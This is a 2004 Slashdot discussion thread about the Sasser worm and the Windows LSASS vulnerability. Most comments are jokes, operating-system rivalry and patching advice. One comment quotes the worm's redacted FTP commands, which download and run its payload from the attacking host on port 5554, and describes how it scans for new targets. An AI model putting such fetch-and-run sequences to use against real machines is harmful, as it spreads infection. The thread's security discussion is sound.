Slashdot Mirror
New Windows Worm on the Loose
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."
the luxury of being behind a nat box with all ports off and not having to deal with such nonsense
What is this 'Windows Update' of which you speak?
Liberals call everyone Nazis yet they are the closest thing to it.
Mutexes are named consistently enough under Windows that I wish somebody would make a program that simply caught all attempts at gaining a mutex and popped up a dialog window if the mutex hadn't been seen before. This would stop most any new software from running without first checking with the user. This is no good for a server of course, but ideal for a workstation.
This would also be great for catching spyware crap installs, as well as things like the RealPlayer toolbar that keeps popping up adverts by default. Simply tell the mutex checker to decline the requested mutex from then on and it would have the mutex always fail from then on -- then those programs could never be run again.
A new worm?Oh, there it is.
Trolling is a art,
For anyone already infected, Microsoft has manual removal instructions for the worm, located here:
. asp
http://www.microsoft.com/security/incident/sasser
Atleast for me as the local consumer support guy.
Thanks Microsoft.
A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!
The add server must be based on Microsoft's new Irony.NET framework!
Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?
I think all good Windows-using Slashdotters should have threw their windows machines off a balcony long... long ago.
Since most users don't have a firewall and don't use Windows Update, I wonder how many machines will be infected by Monday? Seriously now, it's getting old now. Good thing I'm using Linux now.
Fox New's official death toll caused by this new exploit stands at zero, but that can change any second now. Find out how to save yourself, tonight after the weather...
at my university (geaux tigers), we're already feeling the effects. students in the dorms dont patch their computers and they wonder why they get viruses. we send out frequent emails reminding them to patch their computers but they fail to realize it. only if they would use linux......:)
No need, I receive all the Windows critical updates by email. I don't know how I got subscribed to that mailing list, but it's damn convenient.
I have a Mac, you insensitive clod...
Where the value of X-Mailer: is the true measure of a man...
You know, normally these updates are available a good 3 or 4 months before the worm becomes available. This one was updated about 3 days ago. And MS claims to be beefing up their security efforts. ...
In light of this, would someone please explain why I would ever want a Mac? None of the really good viruses or worms are ever ported to it, no matter how successful they are!
This is either a *really* old issue and I've already patched for it, or it's so new MS doesn't have a patch for it yet.
Either way, I don't see anything about it on the windows update site.
Just once, I'd like it if someone called me "Sir".
Without adding, "You're creating a scene."
More information at Computer Associates, F-Secure, Symantec and McAfee.
Where's Panda in that list? Personally I prefer Panda over those.
I'm impressed that they got the headline right!
Ya ooo what a gigantic problem.. Every pc user with a brain should have a firewall and anti virus sofware running. If they havent learned yet they deserve to be infected. Heres the extremly complicated solution: Auto update everyday.
The hang time between release of information about an exploit and the release of viruses taking advantage of that exploit is going down. It used to be that most worms were based on bugs that were known and patched months or years ago. In the past few months there have been several worms based on bugs that were fixed only days or weeks before. That makes it much more important to keep up to date with patches than it has been historically.
Windows XP SP2 should mitigate this somewhat, since it will tell a lot more people to update a lot more regularly, plus it comes with a decent firewall. The news that it is delayed is unfortunate to say the least.
Seriously, hasn't MS learnt anything about the Internet yet? Why do they keep insisting to keep all of these ports open all the time? Why so many services running out of the box? Why can't people even close some of the listening ports?
If MS was any serious about security, they would have all ports closed be default. Or at least have a possiblity to closing them down during install.
It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):
open XXX.XXX.XXX.XXX 5554
anonymous
user
bin
get XXXXX_up.exe
bye
XXXXX_up.exe
If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:
The IP addresses generated by the worm are distributed as follows:
50% are completely random
25% have the same first octet as the IP
address of the infected host
25% have the same first and second octet as the IP address of the infected host.
The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.
See:
So I used Microsoft Baseline Security Analyzer to get my patches.
I want a tarpit option for FreeBSD's ipfw, the same way there is for Linux. It'd be nice to do something to slow this thing down...not that it's easy to tell this worm apart from everything else cluttering up my firewall logs.
Carousel is a lie!
Hmm... a new windows worm, exploiting a documented flaw? Never!
Whats new?
# cat
Damn, my RAM is full of llamas.
Slashdot continues it's trend of releasing news that will shake your beliefs to the core! I thought for sure the previous worm was the last possible one!
SAILING MISHAP
1) IE won't work (joking aside it just doesn't work at all). This happened a long time ago, so I switched to mozilla. I thanks ms for this cause moz. owns.
2) Add/Remove programs, I can no longer see the text to describe the program install. It's all grey. An icon shows, so I can uninstall that way. Its not the colo scheme either, I tried MS default and it still didn't work.
3) I was having problems with this latest worm, but patching fixed everything, so now we wait to see what broke.
All and all I'm getting extremely close to wiping the HDD, and dual booting Slackware Linux (which has been on my laptop for over a year and I love it) and win98se for games. All the backups are current, and I'm waiting for the next problem to make the system more unsuable. If I wasn't so damn lazy, this would of been done sooner.
BrendanWorms and spyware will simply use a home-made mutex system if we start to block the windows one.
In general, the idea of catching windows library calls is worthless, unless the library call is absolutely necessary to the worm and the functionality cannot be done in any other way (which is not the case in Mr. Darl McBride's example).
The worm seems to install a ftp server on infected machines. So, wouldn't it be nice to have every box that detects a connection on port 554, reply with an upload of a new wallpaper to the infected windows box with some message like "install a firewall, moron"
I consider it a public service. Maybe you can even deduct the bandwith for the upload from you tax.
I had updated Windows XP except for whatever patch it was for this security hole because I had heard it caused problems. Then of course, Sasser hits and targets the security hole that I didn't patch for.
Damned if you do, damned if you don't.
I'm rebooting into Linux. Screw you Windows.
www.google.com
4. Gimp sucks compared to Photoshop.
Ah, come on now. I'm as friendly to OS as anyone else, but you're just fooling yourself on this one.
I REALLY hate working dial-up tech support.
(ring)
sigh....
Usually these happen on Thursday.
Don't these worm writers learn anything?
In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.
t in /MS04-011.mspx
Sasser generates traffic on TCP ports 445, 5554 and 9996.
The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:
http://www.microsoft.com/technet/security/bulle
This link should work for the symantec description of Sasser. Sangloth I'd appreciate any comment with a logical basis...it doesn't even have to agree with me.
...Mac users worldwide pause, yawn/chuckle, and resume being productive on their machines instead of patching holes or manually yanking out already-present malware.
after reading this on the /. front page, i runned the windows update, that i don't visit for more than a year...
and after some time, a windows pops up with the text:
"The software you are instaling has not passed the Windows Logo testing to verify its compatibility with Windows XP. bla bla bla"
"This software will *not be instaled*. Contact your system administrator."
Ok, so i contact myself, and wonders what the hell?!?
I just give M$ a lot of information about the operating system that i'm running... they wrote the frign thing, and even so, they don't know what will run in it, or what will pass their own crap compatibility verification!
but well, that's it... i just click "OK" --the only button-- and see the same windows appears 3 times more... and blissfuly keep my ignorance of what's going on with the instalation.
424 attempts in my logs since April 29. All coming through port 1025, mostly from Asian boxes.
Only consumer whores and other types of idiots choose to toss out the computer instead of just wiping the hard drive and installing something else.
Speaking of worms, how easily could worms spread if it were Linux that was popular and not windows?
I know linux is more secure, especially because of the multi-user system where root is only used for special reasons, and that many windows programs are integrated in the OS (IE, Outlook...), but how feasible WOULD it be to make worms for Linux? I really don't know. I do use Linux, and I love it. I only boot into windows for certain things such as Battlefield 1942...
---
Never criticize religion on Slashdot. You will be modded down for "Troll" no matter how factual it is.
How refreshing. A Slashdot article about a worm exploiting Windows, without the usual childish jibes. Or FUD. Or spelling mistakes. Well done, Dynamoo!
Of course, then came the comments... :-)
... if we replaced the posts of this thread with the messages posted after a previous worm-announcement, would anyone notice ? :)
;-)
Linux_Zealot says : 5 Insightful - I am using Linux now !
M$_wizard : 5 Interesting - Worms always appear after a security notice from Microsoft Knowledge Base ; so, openness is bad !
security_Teacher : 5 Insightful - Of course, no one should run anything as root but cricital administration tasks, and a firewall is essential.
n00b : -1 Troll - Windows Sucks !!!
Well... That's just a little... repetitive
Just unbind 'Client for Microsoft Networks' and 'File and Printer Sharing for Microsoft Networks' on your NIC. That way, unless someone can exploit basic TCP/IP services like echo, you should be safe.
After I changed email address, I couldn't figure out where I'd subscribed to that newsletter, either... I'd really like it back...
Secunia also alerted about this worm several hours ago, they have a great page about it with lots of details: Sasser worm details
I re-formatted my system and put my firewall up. It was an older version so I uninstalled it and got pre-occupied for 2 minutes... before I had the new one up, Blaster worm. 10 minutes later, re-format.
Damn worm writers.
ogg
Black cat, searing pain, flames...? I must be in Heaven! - Homer Simpson
Everyone knows not to use windows products until after at least 1 service pack, this is an old problem that was fixed with service pack 1. I hope no one on /. is affected by this, because even if you miss most updates, the service packs are the important ones.
I run Windows XP Pro at home so this post raised my concern at first, but if anyone actually read the Microsoft security bulletin, you would all know this.
Before I get flamed for running Windows, that box mostly just runs games, though sometimes I have it running distccKNOPPIX to help cross-compile for my Gentoo Box, its time to rebuild again now that 2004.1 came out!!!!
~ there are 10 types of people in this world, those that can read binary and those that can't
This is like a freaking death sentence considering everyone in town thinks that this is there own free computer tech support hot line.
but it's per se
So for the past few days, I've had to live with part of my bandwidth getting chewed up by incoming packets that don't actually do anything but take up space. It effectively slowed the speed of downloads by about half. The rate of packets is starting to slow down now... finally (I guess as people patch their systems), but it still was highly annoying.
Anyways, I called my ISP when I first noticed it 3 days ago (after checking it with ethereal), and asked if they could help. They told me that this was caused by filesharing programs, which I knew wasn't the case becuase in fact the only port 445 stuff I've done is windows filesharing, and I've secured the one and only Windows system on my LAN against IP addresses other than other ones on my LAN from being able to access them. Needless to say, this answer did not impress me. Here I was, effectively being subjected to a DoS attack, and they are trying to tell me this is _my_ fault? Man, if I had any other choice for high speed internet, I'd be switching in a heartbeat.
Anyways, that's my story. Things like this totally bite because you can have a firewall and all the security precautions in the world, but worms like this still chew up your bandwidth.
File under 'M' for 'Manic ranting'
Windows-using != Slashdotters. There's a contradiction right there.
I once heard of them. Do they really exist, or my friend was just trying to frighten me?
I use the best anti virus on the market! It is called a Mac! Actually I have both a Mac and a WindowsXP Pro box with a router and firewall. Just to keep things clean my windows machine is NEVER used for checking mail. All mail is handled through the Mac. If I have a need to send mail via the PC or need to check it from the PC for some reason then Eudora Pro is used. The Outlook variants are the biggest viri available for the PC....with explorer coming in a close second.
Look at the title of the Sasser worm "what you should do..." page, it says Blaster not Sasser.
Updating windows for the average user doesn't give a bigger headache than fixing something on linux (unless using debian-based distros or gentoo) but is it the same story for companies running winnt-based servers? Just curious since it must be annoying for them and must be these things which makes them think of moving away from the buttafly!
Woops, nevermind...
I pity my educational counterparts in other districts...one in particular has probably a dozen Win2K/W2K3 machines sitting outside the firewall...no protection whatsoever. No, they do not do regular updates...just when something breaks. Oh well, they'll just hire their friendly neighborhood MCSE consultants to come in at $150 an hour to "sell them some protection." It seems like it's always firefighting with Windows anymore...And no, I do NOT run Windows on any server in my district...
another piece of software I can't get for my mac?
I've been working in the Technical Support department of a major Anti-Virus company all day and I am currently speaking to the first customer who is infected with this worm. Hopefully it won't spread.
most of these problems they have (certain virii, spyware adware) could be alleviated and less of a threat simply by running limited user accounts instead of running as an "admin" all the time.
tested this in my home network (the other half has to have windows) her rights are set by a samba acting as a PDC(i was bored), but basically boils down to a simple matter of her account is considered a "limited account" to her local XP machine...if something needs to be installed or needs admin rights she can explicitly tell it to by using the run as...
i've went from cleaning 50+ items / week off that machine to maybe 3-4 and those are simply cookies being reported as "spyware".
tribbles are nothing compared to trolls.
besides trolls smell.
Microsoft needs to stop rehashing NT 4.0 code into Windows 2000, XP and 2003. Isn't it funny how an exploit in NT 4.0 also appears on NT 5.x systems?
Here is an introduction to virus for non-windows users.
{{.sig}}
A countdown timer telling me windows is going to shut down in 1 minute is great for keeping me on my toes in the morning, managed to do a quick search and was half-way reading through a forum when it restarted :( installed the 'patch and it seems to have been fixed, but i thought windows update was supposed to be automatic?!?! it regularly reminds me to install new patches, why not this?
This comment does not represent the views or opinions of the user.
deny tcp any any eq 445 (hitcnt=74147) .... thats since last night.
Wow. I just got that virus this morning (and I'm on a dial-up modem!!!). I had no idea what was going on, but I figured it was a virus. I saw a new program in the "Tasks" window, so I closed the window, found and deleted the file, and destroyed the Registery Key that it had made for reference in MSCONFIG.EXE. That was all there was to it! I'm glad that the creator of the virus was either a dork or a "nice" virus creator and made the virus very easy to get rid of.
I agree the problem is the lack of consumer education, but chastising/blaming the consumers isn't going to get anything done. Companies like Microsoft need to ship their products securely, with ports closed, firewalls on, and with desktop shortcuts/documents telling users why it's important to patch.
Thankfully, Microsoft hopes to accomplish much of this with XP Service Pack 2, hence why the Service Pack is taking so long to be released.
Up, Up, Down, Down, Left, Right, Left, Right, B, A, START
Of course, here on slashdot, it's common enough to correctly identify this sort of malware as a "windows worm," but if this terminology could make it into the more general media, it might raise the general consciousness to make people more aware of the alternatives to Windows. Maybe some informed and polite letters to your local newspaper might make a difference.
or didn't you want a paycheck this month ?
with love
your boss
Microsoft should instead find a way to abandon the use of the "SYSTEM" account, the password-less "super user" account that all applications use to install themselves and modify core system settings.
Or at least disable Internet Explorer/ActiveX's abilities to grant web pages use of the SYSTEM account. (Microsoft could just as easily develop a Windows-updating program similar to "Software Update" on OSX or yum.)
Up, Up, Down, Down, Left, Right, Left, Right, B, A, START
I'm happy, I'm behind a firewall on XP right now, and am firewalling off another PC running XP at the same time. Both PCs are safe, both are running fine.
But still, it's stupid to have any OS that has all these worms going around. I'd like to see Microsoft go through what they already have in their codebase and pull these little fuckers out, then patch 'em. Patch 'em good, patch 'em hard.
Yeah, it's not open source, less eyeballs on the code etc etc, but I'm sorry but if Microsoft, a corporation which is not only making in the region of several billion $PLURALCURRENCY a year but is a frickin' defense contractor, can't invest some money in poking through their code and going "nope, some script kiddie piece of shit is gonna 0wn that" then there's no hope for us all.
(Note: I have just moved to XP from Linux because of hardware not working. So far I haven't got Blaster or been cracked in any other way. I must be lucky or something. *g*)
I'm amazing. You aren't. SUCK IT
try using a google cache.
i've told soo many others by so now, so i might as well put it on slashdot
Blah blah sig blah blah blah irony blah blah
" Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? " roflol windows-update is the virus factory ;)
http://fedora.redhat.com
http://www.gentoo.org
http://www.debian.org
http://www.linux-mandrake.com
http://www.slackware.com
"Ha Ha!"
Nelson, various Simpsons episodes
No electrons were harmed creating this post, though some may have been subjected to electrical and/or magnetic fields.
For the first in history, /. is useful! I was wondering why my box was acting silly, open /., get and error message that an error in lsass.exe will shutdown my computer, and loe, the headline is my problems.... vava la /.!
A patriot must always be ready to defend his country against his government. -edward abbey
Picture a company with a userbase of tens of thousands, multiple hardware types, almost every version of windows with none of them locked down, and limited protection on the server side. Management is just recently getting into the idea of implementing protection at the workstation level while in the meantime viruses and spyware run rampant. To compound this problem, microsoft releases a ton of patches all at once which increases the time it takes to deploy them all. Many of them can get fixed via pushes, but not all of them are networked the same way because each area has their own way of doing things. In order to get antivirus and such installed on many PCs, most of which we don't know where they physically are (inventory for licensing and hardware are just now being started to an extent), you need file and print sharing active. Some people know this so they turn off their file and print sharing. They are running ancient hardware that locks up when you run a virus scanner in the background and they can't get any funding to upgrade their hardware. SMS and lockdown and things are beginning to be considered, but when it isn't the viruses or spyware blowing things up it is the network servers running on what amounts to in some cases computers weaker than the client computers. To top it off, there is no anti spyware software that is enterprise ready at this time so management hasn't bought into anything. Almost every computer you look at has something nasty on it. At least one company claims to have a program that is enterprise ready in the beta stage, but we are not even a beta tester yet. Meanwhile the people who started all of this get promotions because they are saving the company money by not doing anything but bandaiding one small problem at a time.
Anyone else notice that all new worms start infecting computers on a friday and it really becomes big when people come back to work on Monday. Sounds like a planned attack to me.
While Sasser is the worm making the news in relation to the LSASS exploit, it's easy to lose sight of the three Gaobot variants that are *also* using the exploit and is quite frankly, a lot nastier.
I just hope the other variants don't get lost in the hype about Sasser, or ISP's and security folks are going to have much bigger problems on their hands than slowed computers rebooting a lot.
Become an evil genius by eating gifted children!
FreeBSD-based OSX 10.3.4 + A little intelligence = No web-browsing, file-downloading paranoia = Not needing 10 different system-slowing antivirus, antispyware, antimalware, antipopup, anti-spam software.
-Imidazole
Hilarious Office Prank!
You say "killing IE" like it's a bad thing.
Je fume. Tu fumes. Nous fûmes!
Initial analysis seems to indicate classic Blaster-style worm behaviour.
This made me think of a quote from "Broken Arrow", when Giles Prentice (Frank Whaley) is told there is a "broken arrow", he says,
"I don't know what's scarier - losing nuclear weapons or that it happens so often that we have a name for it."
normally my home firewall (linux of course) logs about 100k bytes in messages per day (i have iptables log all dropped packets). Today alone its over 50 megs. Normally i have logrotate.conf set for weekly rotations, but i switched it to daily, and made sure my var partition has more then enough room (3 gigs free, so i think i am ok).
Lawyers, MBA's, RIAA? A jedi fears not these things!
Microsoft should stop publishing these exploits. It practically forces you to update to preempt the attacks that follow.
Well, to be more accurate, they should delay it longer.
Otherwise it would be called "Microsoft Walls"
For Windows I'm using a free firewall by Agnitum. You can get it here:
http://www.agnitum.com/products/outpost/
I love it. I've installed it on any machine that the owner asks for help with. It most basic use can be mastered by any user. Anytime something new tries to come in or go out a windows pops up and asks what you want to do.
It has some more advanced features to. Perfect for that non-computer-science persoon you know who uses a computer.
4 my bro., running any mac os, the use of an "ok" button as a dismiss-this-alertbox target: "no, it's NOT fuckin' OK" that the connection was terminated for lack of activity...dial-up's bane;-)
Yah this Virus is causing all kinds of hell here at Dell... Our call volume for a normal Saturday is agents waiting for calls for 10 minutes at a time... TODAY, however we have 60 calls waiting in the queue... 90% of which are this virus. And the sad thing is, outside of a OS Reinstall we cannot do anything for these guys except refer them to the article son how to fix it or send them to oursoftware support... Gotta love policy *rolls eyes*
Our student dorm has its own network volunteer group, which I'm part of. This worm made a big entrance tonight, scoring 27 infections in two hours, on a network comprising about 300 machines, maybe 220 of which are running Windows. We had to take the suckers off the network AND because that's part of our self-imposed policy, drop a filled-in piece of paper into their letter boxes. I felt like the mail man, running around in the entrance hall with a wad of papers under my arm. Oh, and our upstream ISP got pissed at us, threatening to cut our connection alltogether. To sum it all up, I'm going to kill the guy who wrote this, right after I cheerfully refuse to reconnect all the suckers who fell for it!
Divide et impera!
New Windows Worm on the Loose
What, it's been a week already?
"Writing a suite of mathematical modelling tools to be released as Open Source Software is educationally beneficial."
Check out Scilab. It does what Matlab does pretty much the same way except that Matlab has friendlier GUIs where Scilab is mostly command line. Translating scripts between the two is trivial.
http://scilabsoft.inria.fr/
- You were apparently the only one who could see the funny bit of my post (apart from the mods).
I miss stupidpeopledie.com.
But can you do all of this while compiling OOo for Windows ???
I can minimize a MinGW or Cygwin window with a compile job running while surfing the web in Firefox and listening to the badger song on repeat in Winamp. However, OpenOffice.org requires an expensive compiler unless the project has already tweaked the OO.o suite makefiles to be compatible with Microsoft's two-week-old inexpensive Visual C++ compiler.
Don't you mean to ask if all good Windows-using Slashdotters haven't already migrated to Mac OS X or Linux yet?
yeah, so troll. I know. lol.
Using Symantec AV, I LiveUpdate'd signatures, only to find that it decared System32/w32sup.exe as a trojan and quarantined it.
... these "worms" aren't ever found in APPLES?
God, I love being a Mac user.
Men believe what they want. - Caesar
MSCEs' need the work.
Here's a copy of a notice we've been sending to customers on this issue:
c ription&virus_k=125007c /data/w32.sasser.worm.html
n /MS04-011.mspx
.ASP or .CFM, that's an indication the system may be running on a MS server and potentially more vulnerable).
There's another worm spreading across the Internet, called the "Sasser Worm".
Vulnerable systems include: Windows 2000, Windows Server 2003, Windows XP
See:
http://us.mcafee.com/virusInfo/default.asp?id=des
http://securityresponse.symantec.com/avcenter/ven
Microsoft security bulletin on the vulnerability:
http://www.microsoft.com/technet/security/Bulleti
Among other things, this worm installs an ftp server and a remote shell system to further propagate itself across Windows. It likely has the capability of giving remote users full access and control of the compromised machine, therefore any data on the system may be vulnerable.
Once a machine is infected, it starts 128 instances of itself, trying to spread the worm to other Microsoft PCs. The worm also attempts to disable the ability to shut down or restart the computer/server. The worm may also compromise the "system restore" function under some versions of Windows, so trying to revert back to an older configuration setup might reinstate the compromise!
As you might expect, our servers here are NOT directly affected or vulnerable. However, this is another "blaster" type worm which, once it infects a vulnerable Microsoft system, begins to randomly bombard other systems all around the Internet. The end result will be potentially severe denial-of-service attacks to all systems (in other words, services may be slow or unresponsive due to the traffic increase on the Internet from compromised systems).
We're going to have to wait until Monday to probably see the full-effect of this worm. The ability it will have to disrupt major services online is going to depend upon whether or not people have been routinely running Windows Update (http://windowsupdate.microsoft.com/).
If you are running a vulnerable system (Windows Server 2000/2003 and XP are vulnerable; Windows 95/98/ME are not vulnerable) and haven't run Windows Update in the last two weeks, there's a good chance you are vulnerable, if not infected if you are not behind a firewall and have been online for awhile.
This is yet another annoyance for most of us with Windows on our client PCs. By now everyone should be in the habit of automating or running Windows Update every few days.
The real problem are ISPs and web hosting companies that are using Microsoft NT/200x Server and XP for Internet based services. (And we don't do this but there are tons who do) This is particularly dangerous for e-commerce applications. The admins of these servers have to be forever diligent in making sure their systems are secure. Who knows what critical information (customer data, credit card numbers, etc.) are sitting around on these machines. It seems every week there's a new major vulnerability with Microsoft's servers. This is why we don't use MS products for e-commerce and critical services -- we don't want to risk the security of our clients. I urge everyone to be careful about providing e-commerce to systems running Microsoft servers - they have proven to be exponentially more vulnerable than Unix/Linux counterparts. (if you visit a web page and you see URLs with filenames like
As usual, those of us that do run secure systems are now going to be hammered by infected systems so bear with us while we hold out to see if admins of Microsoft Servers can fix their problems fast before their machines spam the Internet with data and cripple everyone else.
I've been getting these packets since before this worm existed.
They are location service broadcasts and seeks from PCs on the same subnet as you. Yeah, that means Windows filesharing.
This isn't necessarily a virus thing. Did you check the packets to see if they contain exploit packets?
I think you're probably wrong.
The first step is to learn what the various types of "malware" are and how each is spread.
#1. Worms
#2. Viruses
#3. Trojans
Then you have to learn about the security model of each of the systems you are discussing.
Then you have to look at the default installation model ('cause most users will take the default).
Then you have to look at the past patch/release behaviour of the groups developing those systems.
Once you do all of that, you'll find that Linux would be far more resistant than Windows is.
But, until you do all of that, you won't believe anyone who says that.
#1. Linux comes with fewer services installed by default and fewer services run with root level permissions. This limits the spread of worms.
#2. Linux is more resistant to viruses because regular users cannot alter executables.
#3. Which leaves trojans and those are mostly spread by executable email attachments. Take away the ability to execute attachments by clicking on them and you limit the spread of trojans.
So, to be as bad as Windows, a single Linux distribution that ran as root by default would have to be in use by 51%+ of the population and that distribution would have to install the same services and have them actively listening for connections and also have an email client that ran attachments with a single click.
Now you'll see why people mock Microsoft's "security" so much. All of those flaws are in Windows.
Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?
Should read "Of course, all good Slashdotters patch their systems and have a firewall, don't you?".
Running something other than Windows is not a good reason to ignore security.
And in other news ... Delta flights grounded today due to "a computer glitch"
I have to wonder...
Right click Local Area Connection, click advanced, and click enable firewall!
The only game I really play on my home machine is European Air War. Transgaming have lsited it as soemthing like - crashes at start or won't start.
Anyone ever had any luck otherwise?
Bochs: I think EAW on Win98 on Bocs on a PII 400Mhz just won't work
The Singularity is closer than you think
Quant
This appears to be a recurring theme on Slashdot -- i.e., that release of information about the vulnerability and/or the patch causes the exploit (attached to Slow Down the Security Patch Cycle?). See also here (attached to Secret Repairs Preceded TCP Flaw Release).
Only Women Bleed (Sex, Sharia remix)
Guess you missed the article Slashdot posted which showed that Linux is the OS with the most breaches on the net.
Hell, Gnome, Debian, Gentoo, FSF, Savannah, and more were all broken into in the span of six months. Pretty embarrassing for the Linux community, don't you think?
Will WINE support Windows Update so that I don't have to buy a Microsoft Windows license to run Windows update ?
... disabled on my machine. See, they idiotically count stuff as trivial as 'notepad.exe' as a system file which gets replaced if changed. Trouble is, I like replacing it. For my text editor of choice.
== Jez ==
Do you miss Firefox? Try Pale Moon.
...but how feasible WOULD it be to make worms for Linux?
"Here's your new screensaver!
You will be prompted for the admin password so we can install this and set it up.
[prompt] - Install screensaver|install [keylogger/SMTP/ZombieClient]
Please enter your admin password again to verify the settings for security
Thank you! We appreciate your business! Click here to send this to all your friends!"
Currently, Linux is more secure because, among other things, its users are generally more clued up. Put the general Bonzi fan on Lindows, and you'd see much the same thing.
[I}5. Open source is insecure by default. Only by hidding your secrets are they kept safe. [/i}
Ah yes....then why is the NSA even bothering with Linux? Ever heard of Selinux? The NSA doesn't seem to think the openess is a problem.
Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall
I don't understand why so many geeks promote using single-computer firewalls. Which makes more sense:
1. Run 5 unnecessary services that listen on various ports, then use a firewall to prevent anyone from connecting to them.
2. Don't run any of the services and don't use a firewall.
The shareholder is always right.
I work doing tech support for desktop computers made by Compaq and HP, both of which are sold at Wal-Mart. A friend of mine said "welcome to Hell" when I came in today. Now I know why :^(
It's better to vote for what you want and not get it than to vote for what you don't want and get it.
- E. Debs
He was reffering to trojans/viruses spread in emails w/ executable attachments and titled with some fake security bulletin.
Photos.
don't put up with it, wasting tax payers dollars and contributing to the spread of worms on everyone's net. Most states have various ethics laws that might apply to the state worker even if he is just an employee, and not an elected official.
There's honest mistakes, then there's a derelection of service or duty, this sounds like the latter from your description. You may be allowed to file a formal complaint against that bozo, or notify up the food chain there until you get to the nearest elected official in charge of the bozo. If it's like my state it can't be ignored, either.
I just thought it would be apparent from context...
;)
But thanks, anyway
Someone modding me insightful for that one is much funnier than the joke itself... :O
But you got modded insightful. I guess I shouldn't have confused mod intent with poster intent.
Photos.
The new worm
The worm typically shuts down the computer then automatically re-boots it, repeating the procedure several times. Hyppoenen said computers behind a firewall should be spared from the attack.
And how is this different than a typical Windows install?
If for some unknown reason you're NOT using swaret...
"swaret --update"
"swaret --upgrade"
Centralization breaks the internet.
It is common knowledge that microsoft products are by default about as safe from penetration as a prostitute's vagina, and Microsoft is no doubt aware that most of it's users will never change the default settings.
Microsoft had, and continues to, demonstrate a complete inability to produce secure software regardless of supposed efforts to do so, probably because they are suffering from chronic featuritis and will not remove an insecure item if it will also break some (most likely useless) feature.
For as long as this mentality continues, their products will remain bloated and insecure.
We are now approaching the point where other operating systems can compete with Windows tit for tat, and as those alternatives surpass Windows, Microsoft's featuritis and inability to rectify the mess that is their source code will turn around and kick their feet out from under them.
I was aiming at funny, but was completely surprised when I saw the moderation results...
That's interesting.
:P
Apperently your sarcasm detector is set on "low".
(ps. it was a joke)
Had last run WU a day or two before this patch came out. And unfortuntaely was reading this article from a dorm LAN instead of either my apartment or work LAN's, which are fire-walled. :(
FYI, what I got hit with was actually a variant of a different worm updated to use this exploit, meaning the worst may be yet to come when someone splices this onto a worm that actually does damage. Once I got updated virus defs from another machine and rebooted in safe mode Norton ate the thing for lunch no problem. Only their write-up says that the virus makes reg key changes that weren't there. And now I have no idea whether some of the massive pile of alphabet soup in my process manager is residual virus stuff or not. Sigh.
Can I use it without having to mess with Product Activation?
Sure I have a licence, but don't want to run into extra efforts.
Does anybody out there know what would happen if I updated from SP1 (which brought me quite some trouble in this respect)?
change the associations in the registry to point at your new app. (Start with CLSID under HKLM, also under Internet Explorer in software settings to change your view source command. Even a blind search and replace is probably safe enough.)
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
I only run Linux and OS X at home, so walking my mom through getting rid of this virus today (while she was 1000+ miles away) on XP was a challenge. I had her dnld stinger and spybotpro, and got things cleaned up (I though she had McAfee running...). Damn, I need to move back home so I can install Linux for her and demand that she get DSL so I can admin it.
PVCB
free ipod and free gmail!
It seems that for anybody running the Service Pack 2 preview release (which has a lot of nice features such as IE popup blocking, better wireless client etc), there's no hope of patching your system as Microsoft has not made an SP2-compatible patch available yet. The downloadable patches won't install and Windows Update v5 doesn't show the new patches there.
> Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?
yes - but all my friends/relatives don't. have had several frantic calls tonight...
I wish they'd port this to Linux so I get to use this worm.
Oh, maybe WineX will run it?
3. Windows is cheaper then Linux even though Linux is free. It's a TCO type of thing.
What you mean is that it's cheaper to hire somebody to fix a Windows box than a Linux box. There is a grain of truth in this. Windows often packs up for no appareny reason. Almost any unskilled monkey can "fix" a broken Windows box just by hoicking out the power lead, counting to ten and putting it back. Linux only ever misbehaves with a good reason, and requires someone who knows their arsehole from their earhole to fix it.
^^^^^^^^
I work in IT and we rarely see issues with software on our machines. It's always the hardware nowadays. Sure if you get hit with spyware and shit like that you may have problems but that's NOT a flaw in Windows. You'd get the same garbage if they targeted Linux.
With a little common sense Windows will not crash unless you're running poorly written software. Of course you'll still blame Microsoft when someone like Adobe hasn't patched their distiller software in 2 years.
http://www.freebsd.org
http://www.netbsd.org
http://www.openbsd.org
http://www.apple.com/macosx
I dunno, a little "self contact" always helps me to relax!
warning: attempt at humour follows.
...er where did he go?
Windows' House
A worm appears. Windows is surprised.
Enter Worm
Windows (moronically): duh hello? What are you doing in here?
Worm (aloof): Hey windows, how's it goin? Just wonderin' if I could, ya know, come on in for a bit. I know you don't really know me and all, but I just kinda found you here..
Windows: duh you look like an old friend.. what's his name, Bob.. Blast.. something or other. Ok since you're already here, it's not much, but there's a nice breeze that blows through.
Worm: Can I leave some of my stuff here?
Windows: Ok by me, there's a whole bunch of stuff here, people come by all the time picking stuff up, dropping it off. (helpfully) Let me take that for you.
Worm: Nice! Ummm, while I'm here, I have some code, and I just need a bit... err.. executed. Is that ok?
Windows (wary): Well... I don't know you that well.
Worm: C'mon, please? I'm friends with that guy in, uh, the service department, obviously I couldn't get in if he didn't let me in.
Windows (relieved): Oh him! Oh yeah, he's friends with a lot of people. Ok, I'll execute the code... there ya go all done.
Worm: Excellent. Ok, gotta go.
Enter Zone Alarm
